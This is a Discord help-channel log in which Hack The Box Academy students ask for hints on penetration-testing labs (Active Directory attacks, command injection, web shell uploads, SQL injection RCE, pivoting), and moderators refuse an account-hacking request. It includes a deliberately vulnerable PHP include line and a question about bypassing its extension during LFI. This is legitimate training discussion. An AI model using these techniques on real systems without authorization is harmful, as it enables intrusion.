That's illegal, go contact google support, we are not a hacker4hire server

young ore
opaque geyser
#

Hey guys, for module: GPP Passwords, When I run the first command in powershell it says : it cannot be loaded because running scripts is disabled on this system.

tiny rain
#

Thank my friend

opaque geyser
#

Nvm I guess I have to : SetExecutionPolicy

weary dirge
#

how can i reach htb support, please I'm stuck

slender tapir
#

I'm working my way through the first skills assessment in "Active Directory Enumeration & Attacks" and I'm doing something wrong in the process of trying to solve the fourth question. Without giving too much away, I get a scrolling DNS error message when I try to execute the command to get the answer, then my laptop crashes. I'm not using PwnBox and I've even checked the solution provided and followed the same steps - same result, DNS error & crash. Can Anyone give me a pointer?

grim basin
jolly raptor
#

Hey, I’m currently going through the IMAP/POP3 section, trying to find the admin email address, i have openssl into the Server and used the credentials given - however i can’t grasp how to get the email address from this can someone point me in the right direction?

fathom pendant
#

researching imap commands helps :)

nimble scroll
#

any help with this ? 😦 Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

fathom pendant
#

well look at the source code and look for any bit of validation of what's being typed in or uploaded or whatever it is you're doing

nimble scroll
#

still did not find it

#

I don t know where to look

fathom pendant
#
  1. what module are you doing
  2. if it's above tier 0 (and even then) don't share lab content -_-
nimble scroll
#

lesson Injecting Commands , module Command injections

fathom pendant
#

there's a line that contained regex, maybe that's the line :)

nimble scroll
#

still not the right answear :/

fathom pendant
#

yep it is

nimble scroll
#

it is not

#

line 10 it says incorrect

fathom pendant
#

count from the declaration <!Doctype html>

nimble scroll
#

still not right answear

fathom pendant
#

or view in browser --> view page source

nimble scroll
#

I done that too :/

fathom pendant
#

well not sure how you're getting the wrong answer

nimble scroll
#

it gives too little informations to identify the right answear

#

?

fathom pendant
#

you're very close

#

you have to include the doctype declaration in your counting

#

there's not much more information it can give you aside from having an inline comment on it that says "<!-- here's the validation -->"

nimble scroll
#

I don t know where you see <! , I looked at every line and did not find it

fathom pendant
#

sorry misspoke; i meant it'd be more obvious if it had the inline comment

#

but <!Doctype html> is where you start your line count (from 1)

nimble scroll
#

I know , and still did not find the right answear

fathom pendant
#

you're off by one earlier

nimble scroll
#

still not

fathom pendant
#

when you view source in browser there's handy line numbers next to the lines on the lefthand side

nimble scroll
#

still not

#

not even 14

fathom pendant
#

wrong direction

#

||also off by one, not two||

true urchin
#

i am stuck at linux fundamentals

nimble scroll
#

still not found

fathom pendant
nimble scroll
true urchin
#

can anyone tell me why ssh is not connecting to terminal

nimble scroll
#

not even line 13 :/

#

welp, found the right answear :/

fathom pendant
#

empty lines still count as lines

#
<?php echo "example">


e

4 lines even though there's only 1 line of code;

#

(discord didn't like the empty lines >:( )

warm rover
#

hi!

Stuck on the File Uploads Assessment.

Able to read the source, got the path, even uploaded the shell.

#

but getting 404

#

🙂

fathom pendant
#

maybe try and replicate it in your own terminal (may have to slightly modify) using PHP -r

#

i.e. php -r <insert the code here> replacing function references to your upload with 'test' or something along those lines

warm rover
#

yeah I tried to bypass by understanding the code. still somehow failed.

fathom pendant
#

there's something that's functionally happening to your upload filename before it's uploaded

#

i believe it's near the top of the code that it happens

#

well it's formatting it a specific way

#

also spoilers

warm rover
#

I saw it earlier, and tried with that name and path as well.

fathom pendant
#

look into the command it's running

warm rover
#

well, let me dive deeper.

fathom pendant
viral lotus
#

just a quick one: Linux Privilege Escalation - docker. I have the flag. in the P.O.C they get the SSH key so they can remote in as the user. is this just to show us what is possible or can this be achieved on the box. I didn't want to chase a rabbit hole 🙂 or break anything lol

full wagon
# safe star apparently you didnt

Ok, so just to clarify: The task is NOT about trying to exploit the ticketing app, similar to ticketer, but rather just use some of the credentials being presented in the section??

fathom pendant
#

correct; gaining access to an app via some credentials you harvested and utilizing search features within to find information

full wagon
#

when you say "you harvested", is this exercise related to the previous exercises in the "Attacking Common Applications" or is it about using something from the text part? Sorry for being persistent but I am just confused

rain saffron
#

i thought i found the flag for the question on "Network Enumeration with Nmap | Nmap Scripting Engine" but it doesn't seem to be taking it as an answer? Could it be the wrong flag that's there from a different exercise?

fathom pendant
fathom pendant
#

some modules reuse the same lab over a couple sections

full wagon
slender tapir
fathom pendant
digital sun
#

Hello one more question if i buy the subscription do i still pay cubes ?

slender tapir
fathom pendant
#

well allot distribute

#

cubes don't expire

full wagon
fathom pendant
#

you may be overcomplicating it

#

there's credentials given in the section

#

you're not bruteforcing the user/pass on this

#

even the official solution (when i had access to it) says to use the sample creds given by the section

#

(imo annoying, but is what it is)

full wagon
# fathom pendant there's credentials given in the section

Ok thanks, already had tried all the creds without access, so thats why I started doubting what the exercise was about, and started trying to exploit it (which would have been more fun). I will try again, and if access is denied I'll raise it with support I guess (?)

fathom pendant
#

make sure to try variations of the usernames with and without the @ domain

viral lotus
full wagon
full wagon
fathom pendant
fathom pendant
#

[not included is username for what should be obvious reasons]

full wagon
digital jolt
#

any online support here?

full wagon
# fathom pendant worked for me

As a benefit of my initial confusion, I got to read up on osTicket exploits, and try some out, so thanks to that I actually learnt 😅 Now, everything good. Sorry for getting frustrated and appreciate your patience.

proud pine
compact halo
#

I am having an issue: Exploiting Web Vulnerabilities in Thick-Client Applications

#

I cannot get the fatty-client-new.jar app to open after rcompiling it

#

I have reached out to support and they said check here. Has anyone had this issue

high citrus
#

Hi guys, i've been stuck for a while in the information gathering module, i solved the issue, but i have a doubt on what is the difference between ffuf and gobuster for Virtual host fuzzing, cause i notices ffuf gives like every word in the wordlist as aa possible vhost, this way it doesnt sound much useful, i was wondering if i missed something on how to use it

tired atlas
#

I hate my life

nimble scroll
#

I got this , Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file? , I tried via burp suit and didn t show anything but erors

#

how should I proceed?

#

module , Command Injections , lesson Bypassing Space Filters

rustic sage
#

The module has it

stiff bone
#

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?

rustic sage
#

Likely, you are trying to compile those .java files src folder straight away into .jar. I believe the correct way is to convert the specific edited one back to .class, replace the relevant original fatty client .class and then compile that folder with all.class files to get the .jar

rustic sage
hybrid temple
#

Anyone able to give some hints on Advanced SQL Injection Skill Assssment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck

solar bloom
#

Module> Getting Started- Public Exploits. The question is asking for flag. After running NMAP I only see SSH and rpcbind open. Scan for exploits using searchsplit and metasploit. Find a few but doesn't appear to be the right direction. Look at the solution and the first thing they have you do is open a web browser. Why? This port didnt appear up and it nmap shows http closed despite the webpage loading, why?

fathom pendant
#

http doesn't have to be 80

shut wraith
#

LDAP AD Module

It says this command then i use it and it doesnt work.

And zero AD commands work...

Any help as to why it cant reach the AD server ?

rustic sage
#

Its evil win rm, it could be Kerberos double hop problem. Although, I’m not sure

shut wraith
main ridge
#

Use different characters in ESSID Stripping.

rustic sage
safe star
plain raven
#

Hello folks I just needs help

acoustic owl
plain raven
fathom pendant
sharp wren
fathom pendant
#

for what academy module? as far as I know there's no academy module for android maldev

#

this channel isn't for help with random maldev stuff if you wanna read and follow #welcome you'll have access to more of the server

#

but it sounds like what you're working on is unrelated to htb academy

plain raven
acoustic owl
median gale
#

The other 2 are just as straightforward as they seem?

shut wraith
#

Hey @acoustic owl since u are here i wanna ask u, did u delve into exploit development and process injections? If so what did u do / learn

fathom pendant
#

@azure depot we don't do account hacking here;

  1. that's illegal
  2. see #rules
azure depot
#

OKAY okay

#

Thanks...

#

I'm rly desperate to find the truth

acoustic owl
fathom pendant
azure depot
#

Ye that's what happened.

fathom pendant
#

but as stated: this server isn't a hacker4hire server or anything like that

shut wraith
#

Anyone do the new process injection module

#

Or any EXP dev ?

main ridge
safe star
lusty thicket
lunar flicker
#

Hi guys, I'm in the ADVANCED SQL INJECTIONS Module Skill assesments - Questions 2:
I could get the user and now I’m struggling with RCE, I can tell you what I’ve tried so far.
||I got pg_sleep but I noticed that I do not have superuser privileges, then I’m trying to grant privileges for it but nothing is working.|| Am I in the right path?

#

Please help, I'm very tired of this module, very hard tbh

stable sandal
#

Hello Everyone
After finishing the Bug Bounty Hunter Path of the CBBH Cert, what other HTB Academy modules or external resources would you recommend to deepen my knowledge in web security?

stable sandal
deft bison
#

Anyone else having issues rdp-ing into Evasion Dev on Windows Evasion Module Introduction section? Can rdp to Evasion Target just fine

rugged bolt
#

having trouble on both pwnbox and VPN connection.

deft bison
compact patrolBOT
shut wraith
#

DM u?

dark hedge
#

hold on a sec

#

@river aspen can i open a ticket

lusty thicket
honest crane
#

Hi folks, currently doing the AEN module blindly. I got DA, but there was a second NIC, so I pivoted again and found a host with SSH open. Is there something more to it, or the guide basically has creds for going in getting another flag?

random pebble
#

Heyyyyy

steel mulch
#

Why cant I talk in general

rugged bolt
honest crane
safe star
#

not what you said

honest crane
#

I got it now, thanks. This was kinda easy, I expected a lot more on the second pivot

wide river
#

I have a question about Intro to Window Evasion module. The way it designs is to upload payload on the target machine, open netcat and automatically will get revshell after waiting couple minutes.

How.... does that happens?
If i decide to do it on another box, can i just wait for the revshell to trigger too ?

cloud urchin
#

there's a program running that checks every 30s or minute i forget which. and no, if you spawned another target box on another section it would kill your current target.

wide river
# cloud urchin there's a program running that checks every 30s or minute i forget which. and no...

yea, i was tryna do it on another box. when i trigger exe, it ask for dll file, when i upload both exe and dll file, i got result like...

||Architecture: x64
App host version: 6.0.10
.NET location: Not found

Learn about runtime installation:
https://aka.ms/dotnet/app-launch-failed

Download the .NET runtime:
https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win10-x64&apphost_version=6.0.10||
#

so how.... can i utilize what i learn from that module to the other lab? that is my main question

cloud urchin
#

it's teaching you how to evade the av software

#

so when you attack boxes your payloads aren't flagged

proud pine
sharp wren
#

Hey everyone, I'm in the Windows Attacks and Defense and my RDP into the target/bob keeps on dropping. Anyone else at the same point and experiencing an issue? I've been troubleshooting for 2 days now, and can't figure out what's going on. I managed to work for a couple of hours earlier today without interruptions, but I'm stuck again. The window connects and Windows desktop pops up for a few seconds, then disconnects again.

waxen totem
sharp wren
#

i have

waxen totem
#

Welp that's my one bullet kek

sharp wren
#

I get "Host key for [ip] has changed and you have requested strict checking.
"

#

anyone encounter host key issue? how are there so many lab issues I get time to sit down and study I can't even study

fathom pendant
#

nope

cloud urchin
sharp wren
#

nope

#

are there any mods or student mentor I can ping?

#

oh you are mod Hi @cloud urchin

#

what is the host key issue?

wide river
sharp wren
cloud urchin
# sharp wren what is the host key issue?

your ssh client stores the host key bast on the hostname/IP pair in ~/.ssh/known_hosts, sounds like you've respawned the target and it has a new ip. you need to remove the old hostkey and then reconnect.

cloud urchin
sharp wren
#

understood - i do not use the pwnbox at all, im only using ovpn

cloud urchin
#

i've noticed some servers are worse than others, if RDP is unbearably slow try changing servers or maybe even regions.

#

also use the TCP VPN instead of UDP as it's more stable

#

you could also try adjusting the MTU as described in the link I provided above

rocky spade
#

Hey guys, how are you? I have a little problem with a question in the password cracking module in the network services section, where I was trying to crack the RDP password but it doesn't find it.

I have the same VPN with which I did the WinRM and SSH one where I found them easily, I tried to contact support but they couldn't give me a solution and they told me that the server works fine and to ask here on discord

cloud urchin
rocky spade
#

Sorry for the spoiler, I didn't realize.

cloud urchin
#

it's wasn't the same as what i see

rocky spade
#

At the beginning I used the same command, but it didn't work, so I added things to see if it improved the results.

#

I even tried with netexec to see if I had a different result and it didn't work either.

cloud urchin
#

ok let me try

rocky spade
#

Perfect, I'll be waiting, thank you very much.

cloud urchin
#

yeah i was able to get it in a few seconds

#

i just used the provided commands

rocky spade
#

I'll put the same commands and in 10 minutes or so I'll show you.

cloud urchin
#

ok DM me

rocky spade
feral adder
#

Hello guys I can't access the XSS Hijacking Session because the target doesn't have a port? ip:port should be like this but mine only has an ip of target.

cloud urchin
feral adder
#

I was able to access it.

#

the problem is I think I need to connect to vpn first.

cloud urchin
#

yeah if the target doesn't spawn with a port you'll need to be on the vpn to access it

hybrid temple
#

Anyone able to give some hints on Advanced SQL Injection Skill Assssment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck

neat pelican
#

do some targets in academy have lower resolution? Just did an RDP on one of the targets (parrot OS) even looking at the display settings there is no option to increase the resolution. I am using remmina

willow furnace
#

Hello,
I'm still fighting the "Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"
I have working proxy, credentials and tool to begin an attack but all i get is a timeout error
Other tools are working fine with proxy, so i don't know why this one is getting time out, i've check the port by powershell on jump-host and everythings seems open to attack

#

This is : AD Enumeration & Attacks - Skills Assessment Part I

fathom pendant
neat pelican
willow furnace
#

It helps, but i found a bug when you are make the initial connection with RDP it cant connect with client res

#

so initial connect is with initial window size, the second connection is with client resolution

#

and everything works just fine

#

also there is a option in xfreerdp /dynamic-resolution that helps a lot

neat pelican
willow furnace
#

OH, the remmina

#

in the new connection profile, you need to scroll down a lil

#

and there are the resolution options

#

so if the remmina creates a windows, it changes resolution on fly

neat pelican
#

that just goes to show I haven't explored this tool lol. You are a lifesaver @willow furnace configured it to use client resolution. But I am currently in an RDP session so maybe this might take effect next session

marble stirrup
#

"Hey everyone, I’m new to the world of ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone. Could anyone guide me on how I can start learning and what resources I should focus on? Any advice would be greatly appreciated!"

willow furnace
#

I can ping DC from jumphost, but the proxy from parrot is getting timeouted

rustic sage
#

Hiii people , I’m new to ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone and laptop elite book. Could anyone guide me on. Im also learning from cybrary. But someone told me its not much practical. Any guidance??

willow furnace
neat pelican
#

dude @willow furnace you're also on AD enum and attack module?

willow furnace
#

on the Assessment part rn

neat pelican
#

just started this module and the slow response from the rdp frustrates me so I setup a proxy

neat pelican
willow furnace
neat pelican
#

I used ligolo so that I'll just transfer the agent via pyserver or ssh

#

the setting up of the tunnel is the annoying part

willow furnace
#

the newest one is 1.10.1

neat pelican
willow furnace
#

most of the time you need to upload the second chisel to target

neat pelican
#

hmm how will I know what version of parrot is the pwnbox?

willow furnace
#

the pwnbox is the VM that they give you

#

idk if you are using theirs VMs or your own Kali/Parrot/distro

neat pelican
#

oh nvm found it

#

It's 5.0

#

I use my own VM (kali) then just openvpn to the pwnbox (or target)

#

but ligolo works well also in this version. I just configured the agent because there's a missing GLIBC on the target

limber fog
#

Hello, I finished Footprinting's Hard assessment, and I have a few questions on one of the steps to find the flag, is anyone available for a quick mp 🙂 ?
Have a good day

waxen totem
#

try not to be too revealing though

limber fog
#

It's about one of the steps to the flag, so I would be spoiling 😓

waxen totem
#

ok fair enough, sent a friend request so you can DM me

daring tundra
#

Hi, I have some questions regarding proxychains..

So I have already added the IP and the domain name into /etc/hosts file. however i keep getting this error

#

is there something i am missing?

waxen totem
#

Looks like it's tryna go through DNS, there should be a setting in your proxychains.conf that you can uncomment

daring tundra
#

... found the issue

waxen totem
#

was just about to mention /etc/resolv.conf

daring tundra
#

I'm a bit confused, why is it reading from this file instead of proxychains.conf

waxen totem
#

Cos you're passing in a domain name instead of an IP it tries to resolve that domain name through the specified DNS

daring tundra
waxen totem
#

gimme 2 mins I'm actively looking for an old pdf with notes on precisely this

daring tundra
#

alright, my other question is, do i have to re-establish my chisel connection if i changed my settings?

lusty thicket
daring tundra
#

asking this because im doing an assessment that only allows chisel connections, otherwise i would have used ligolo

lusty thicket
#

chisel is not dns dependent

#

the only time chisel is relevant is if your server is set up on a domain rather than an ip

waxen totem
#

Welp can't find the notes kek

waxen totem
daring tundra
#

Im not sure if this means it is working now?????

#

im doing asreproasting

waxen totem
daring tundra
#

i placed nameserver 172.16.15.3 into resolv.conf

#

earlier it kept looking for 1.1.1.1 then the 4.2.2

waxen totem
waxen totem
daring tundra
#

it kept searching for INLANEFREIGHT.LOCAL at 1.1.1.1:53

#

then i was like, bruh, why you looking for 1.1.1.1 at port 53

daring tundra
stiff bone
#

can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?

nimble marlin
#

ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:c1:89:90:7f:fd:4f:60:e0:54:f3:85:e6:35:6c:2b (RSA)
| 256 e1:8e:53:18:42:af:2a:de:c0:12:1e:2e:54:06:4f:70 (ECDSA)
|_ 256 1a:cc:ac:d4:94:5c:d6:1d:71:e7:39:de:14:27:3c:3c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

#

it say wrong answer

acoustic owl
nimble marlin
earnest pasture
nimble marlin
earnest pasture
nimble marlin
earnest pasture
acoustic owl
slim otter
#

Hi all, in the Shells and Payloads skill assessment the second host requires credentials to log in to progress with the tasks. I have checked the host-2 hint which gives the credentials but I was wondering is there another way to find them without the hint?

hard mango
#

hey

#

I'm doing the Wi-Fi module and I can't get this question:

#

Check the driver capabilities for the interface. How many software interface modes are available? (Answer in digit format: e.g., 3)

#

I used the iw list and get the " Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
...."
etc

#

But when I send the quantity that is in "Supported interface modes" of the "iw list" command, it is not showing as correct.

lavish ember
#

Hey everyone,

I'm having some issues running Responder through a Ligolo pivot.

Here's the situation:

I'm using Ligolo to pivot into a network.
I tried running Responder on my attacker machine through the Ligolo tunnel, but it’s not capturing anything.
However, when I ran Responder directly on the target machine (which is a Linux box), it did capture some traffic successfully.

I'm not sure what I'm missing — maybe a routing issue or something else.

Has anyone faced this before or knows how to fix it? Any help would be appreciated!

Thanks in advance! 😊

candid lily
#

is secure coding module really worth 1000 cubes?

deep pier
#

just a quick question when you finish a module is it possible to go back and review just asking since im on the fundamentals to linux and most of the commands are confusing to me right now

bright coral
jagged brook
#

How can I bypass appended file extension in lfi

#

My code look like
include($_GET ['file'] . ".php")

#

I try using php filters but not work

#

I try null byte and truncation but not work since the version of php is 8.3

#

So how can I bypass it?

tiny karma
#

Hi

acoustic owl
keen walrus
#

guys i could rlly use some help here :

swift lava
#

if i want to start bug bounty should i get pentration tester path or bug bounty hunter? and which one is the deep in information

keen walrus
#

cause the cpts path include ad networking etc...

swift lava
#

thank you

keen walrus
#

u welcome : )

#

anyone can assist me with cbbh path issue im facing ?

#
  • 1 Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
    ---- got this question and answered this : mail1.inlanefreight.com
#

but still facing wrong answer

lapis sky
#

I was working on cpts path, footprinting module specific, while working on smtp enum it asked me about username on the smtp, so i did enumeration and some nmap scripts and metasploit and it did provide me users , but non of that work, realized the user was far away from those and kinda unique, is the mistake from the lab or what exactly?

deep pier
sand sedge
#

this is the target an i can't acces the web page : Target(s): 10.129.109.119 (ACADEMY-XSS-ASMT)

#

iam in the xss module the easy one in phishing section

sand rose
#

Hello guys. I don't see a spot specifically to ask about retired labs, so I'm going to post a quick (simple) question here: When I try to use ldapsearch, I keep getting the full help options when I dont want it. Is it a syntax error?

ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"

The IP address is correct and live (I can ping it) and the domain is htb.local

cloud urchin
sand rose
#

And to clearify: The output I get from the above is the help list (as if I typed: ldapsearch --help)

cloud urchin
sand rose
#

May I DM you Super?

#

About the Platform secion specifically.

cloud urchin
#

ok

sand sedge
#
PING 10.129.109.119 (10.129.109.119) 56(84) bytes of data.
From 81.192.249.78 icmp_seq=1 Time to live exceeded
From 81.192.249.78 icmp_seq=3 Time to live exceeded
From 81.192.249.78 icmp_seq=4 Time to live exceeded
From 81.192.249.78 icmp_seq=6 Time to live exceeded
From 81.192.249.78 icmp_seq=7 Time to live exceeded
From 81.192.249.78 icmp_seq=8 Time to live exceeded
^C
--- 10.129.109.119 ping statistics ---
8 packets transmitted, 0 received, +6 errors, 100% packet loss, time 7088ms```
acoustic owl
#

if you are not using the PwnBox, you need the VPN connection to access the HTB network

sand sedge
cloud urchin
#

As PayloadBunny said, you must connect to the VPN to access the HTB network and reach your target

sand sedge
#

ahh so without port i can use it in pwnbox

#

thanks guys i appreciate that

cloud urchin
#

you have to use either the pwnbox or the VPN, but make sure not to use both at the same time as they share the same IP so it will cause connectivity problems.

cloud urchin
#

@carmine delta please make sure not to post spoiler content from the modules

#

anything above t0 isn't allowed

carmine delta
cloud urchin
royal escarp
#

@cloud urchin i need to send an image

#

Its important

#

Kinda

#

...

cloud urchin
#

i believe you need to be hacker or higher on the main platform, make sure to link your HTB account by following the instructions in #welcome.

cloud urchin
royal escarp
#

Ok il ask but i dont think it would be understanding

#

So i used cURL into ip adress HTB gave me with /download.php path just like it said i got the flag, looks like a flag but it says that its incorrect

#

Idk ehat to do

cloud urchin
#

may not be the flag then, but if it is make sure you don't have any whitespaces or extra characters. maybe try manually typing it out.

royal escarp
#

Il try manual typing

#

Thanks

#

It worked it just had an extra space while copying

cloud urchin
#

@carmine delta it looks to me like it's because the way you're trying to call to the entity reference and how the xml parser expects it to be a standalone entity reference. i don't believe concatenating the email before the entity reference is valid content so it doesn't work. also please don't post spoiler content from anything above t0.

carmine delta
#

ok thanks 🙂 I don't think it's a spoiler and then my payload doesn't even work

shut wraith
#

Hello anyone did the process injection module ?

lusty thicket
#

ask your question properly

shut wraith
lusty thicket
lusty thicket
#

it's just not a straight forward enumeration exercise

shut wraith
#

Can anyone help with why I cant get windapsearch to work?

old wren
old wren
shut wraith
old wren
lapis sky
fickle crystal
#

Update the packages first

lusty thicket
shut wraith
solid epoch
#

im in the footprinting module

when i wanna download "Important Notes.txt" I need to write get Important\Notes.txt ?
But why ? Isnt there any other way like: get 'Important Notes.txt'

hybrid temple
#

Anyone able to give some hints on Advanced SQL Injection Skill Assssment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck

lusty thicket
fathom pendant
#

@sand sedge please don't post spoilers for modules above tier 0 :)

sand sedge
fathom pendant
#

By simply stating that it doesn't appear to be getting removed, someone that's done the module can request to dm so that you can troubleshoot it there

sand sedge
#

ahh ok thanks for the info

#

btw did you know why ?

tulip hearth
#

hello can anyone help me in the web services and api attacks skills assessment, stuck for days already

fathom pendant
sand sedge
#

btw the payload mentioned in the section not from my own

fathom pendant
sand sedge
#

how can i bc if i do an <!-- i can not inject something how i can escape it

#

i don't have control over the page

fathom pendant
#

Look where the payload is injected

#

Escaping isn't just about inserting arbitrary html comments

sand sedge
#

ahhh i see thanks alot

tulip hearth
#

hello can anyone heloo

#

web api attacks skills assessment 😢

magic scarab
#

Any Assembly language wizard here - I struggle with a question from Introduction to Assembly Language - Unconditional Branching.
I have confirmed the answer with AI etc. I am 100% sure I have the right answer, but I can`t pass it.
**Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end? **
the conditional instruction added makes the rbx value unchanged - so it should have the value of the initialised one - GDB debugging also confirms it. What is wrong with my thinking?

golden horizon
#

Hello, did someone have a few problem installing/using the pth-toolkit ? Can I dm someone ?

lusty thicket
tulip hearth
#

hello can anyone help
web api attacks skills assessment

safe star
#

wait which one

#

web services?

#

or the other api attacks

tulip hearth
tulip hearth
tired bough
#

anyone else seem to have issues getting reverse shells on kali to work when connected to the VPN? it works fine in pwnbox but when i try on my VM it wont work. Im using the ip address from tun0 but netcat never gets any connection. its super annoying

#

doing the file uploads module

#

when i directly put in my tun0 address into my web browser i get an http request in netcat so i know its the right address, iptables looks to be fine but im not quite sure

waxen totem
#

try swapping to TCP vpn

tired bough
#

k one sec

#

still nothing

#

can i DM you my ip tables rules, woundering if im missing a forward request

#

and im not using both at once, tried it on vm dident work, then killed the vpn connection and tried pwnbox and it worked lol

#

so weird

waxen totem
#

which section of file uploads is this btw?

#

Can you try it on one of the sections where a direct shell/interface on the target is provided?

tired bough
#

web shells, specifically pentestmonkey

waxen totem
#

just check if you can access the webserver through the target's browser/curl

tired bough
#

yeah that works

waxen totem
#

Therefore it's not an ip tables rule issue

tired bough
#

i can access everything outgoing, but not incoming

tired bough
#

like when i uploaded phpbash i was able to access it through browser and interact with the target, but when i uploaded pentestmonkey with my vpn IP and the port netcat never gets anything coming back

#

oh wait im dumb and had a dyslexic

#

let me try that lol i misread u